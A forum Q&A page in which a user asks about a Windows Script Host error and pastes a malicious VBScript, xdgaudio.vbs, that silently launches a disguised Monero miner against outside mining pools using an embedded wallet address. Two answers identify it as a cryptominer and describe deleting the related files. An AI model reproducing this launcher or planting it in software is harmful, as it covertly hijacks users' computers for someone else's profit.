-6

Windows Script Host error.

The content of the C:\Windows\xdgaudio.vbs are as follows.

Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing

I attach a picture of the error, please see and give me a solution.

enter image description here

Hamza Anis
  • 2,475
  • 1
  • 26
  • 36
Helping Koushik
  • 1
  • 1
  • 1
  • 3

2 Answers2

2

Figured it out!! Short answer: Delete "servicecrsssr.vbs" file from your Windows directory, then reboot. (I actually PULLED THE PLUG, despite the danger of file loss/corruption, to avoid the possibility of the program attempting to rewrite any offending files during the shutdown process.)

A number of other files are involved, but upon deleting (or renaming) the file above and rebooting all was well... no evidence of the mining process running. I caught this virus on TWO of my test computers. These were the only computers I connected my customer's infected drive to via USB. It's STILL a mystery exactly how this thing propagates! The other files which seemed to be involved were:

\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf

The *.pf file rewrites itself with new random characters in place of the "x"'s if you rename or delete it and reboot - with no ill effect that I can determine. On my first infected machine, I renamed ALL of the files above, rebooting after renaming each one. The last file I tried was "servicecrsssr.vbs". On the second infected test machine, I only renamed the "servicecrsssr.vbs" file and rebooted, then all was well. Please let me know how this works out for you. Thanks!

LREmery
  • 21
  • 2
0

It is indeed a bitcoin miner, thankfully it's a fairly crappy one and very obvious and no more malicious than to run a background process. Neither of the anti-virus/malware apps I run picked it up though. Mine was found in a game kids downloaded packed in a setup file.

Anti virus programs should have picked this up easily, vbs and batch files are so obvious. Malwarebytes eventually complained about the actual miner .exe file that they call but only after it was running.

dmiller423
  • 1